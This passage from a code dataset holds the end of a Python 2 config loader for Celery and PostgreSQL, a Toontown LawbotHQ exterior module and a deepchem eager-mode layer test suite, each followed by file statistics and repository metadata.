        dicConfig = {
            "celery_broker":CONFIG.get('Celery', 'broker'),
            "celery_result_backend":CONFIG.get('Celery', 'result_backend'),
            "dbpostgres_ip":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'ip'),
            "dbpostgres_port":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'port'),
            "dbpostgres_user":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'user'),
            "dbpostgres_password":CONFIG.get(_CONFIG["SYSTEM"]["POSTGRESQL"],'password')
        }
        return dicConfig
    except Exception as e:
        print "~~~~celery config error~~~~"
        print e
        return False
    finally:
        if os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
            with os.popen('/bin/rm /var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))) as osrm:
osrm.read() | 41.220779 | 236 | 0.639887 | 366 | 3,174 | 5.319672 | 0.45082 | 0.035953 | 0.049307 | 0.058552 | 0.326656 | 0.250128 | 0.167437 | 0.151002 | 0.151002 | 0.151002 | 0 | 0.022104 | 0.173283 | 3,174 | 77 | 237 | 41.220779 | 0.719893 | 0.083491 | 0 | 0 | 0 | 0.02 | 0.329173 | 0.163417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.04 | 0.08 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4e7db74b0a777f921aa87993b291e973a2d6ac3 | 1,652 | py | Python | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 1 | 2020-09-27T22:12:47.000Z | 2020-09-27T22:12:47.000Z | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | null | null | null | toontown/coghq/LawbotHQExterior.py | journeyfan/toontown-journey | 7a4db507e5c1c38a014fc65588086d9655aaa5b4 | [
"MIT"
] | 2 | 2020-09-26T20:37:18.000Z | 2020-11-15T20:55:33.000Z | from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from pandac.PandaModules import *
from toontown.battle import BattlePlace
from toontown.building import Elevator
from toontown.coghq import CogHQExterior
from toontown.dna.DNAParser import loadDNAFileAI
from libpandadna import DNAStorage
from toontown.hood import ZoneUtil
from toontown.toonbase import ToontownGlobals
class LawbotHQExterior(CogHQExterior.CogHQExterior):
    notify = DirectNotifyGlobal.directNotify.newCategory('LawbotHQExterior')
    def enter(self, requestStatus):
        CogHQExterior.CogHQExterior.enter(self, requestStatus)
        # Load the CogHQ DNA file:
        dnaStore = DNAStorage()
        dnaFileName = self.genDNAFileName(self.zoneId)
        loadDNAFileAI(dnaStore, dnaFileName)
        # Collect all of the vis group zone IDs:
        self.zoneVisDict = {}
        for i in range(dnaStore.getNumDNAVisGroupsAI()):
            groupFullName = dnaStore.getDNAVisGroupName(i)
            visGroup = dnaStore.getDNAVisGroupAI(i)
            visZoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
            visZoneId = ZoneUtil.getTrueZoneId(visZoneId, self.zoneId)
            visibles = []
            for i in range(visGroup.getNumVisibles()):
                visibles.append(int(visGroup.getVisible(i)))
            visibles.append(ZoneUtil.getBranchZone(visZoneId))
            self.zoneVisDict[visZoneId] = visibles
        # Next, we want interest in all vis groups due to this being a Cog HQ:
        base.cr.sendSetZoneMsg(self.zoneId, list(self.zoneVisDict.values())[0])
| 41.3 | 79 | 0.72276 | 172 | 1,652 | 6.94186 | 0.5 | 0.060302 | 0.021776 | 0.031826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000759 | 0.202179 | 1,652 | 39 | 80 | 42.358974 | 0.905159 | 0.079903 | 0 | 0 | 0 | 0 | 0.010554 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.366667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4f84b78cd23bfc6c4e94d2d3b58c3a8e6dd5d94 | 34,172 | py | Python | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | null | null | null | deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | c5a7c6fff0597b5d896c865efdacec4fa75b00c6 | [
"MIT"
] | 1 | 2019-05-19T14:22:32.000Z | 2019-05-19T14:22:32.000Z | import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
"""Test invoking GraphEmbedPoolLayer in eager mode."""
with context.eager_mode():
V = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
adjs = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
layer = layers.GraphEmbedPoolLayer(num_vertices=6)
result = layer(V, adjs)
assert result[0].shape == (10, 6, 50)
assert result[1].shape == (10, 6, 5, 6)
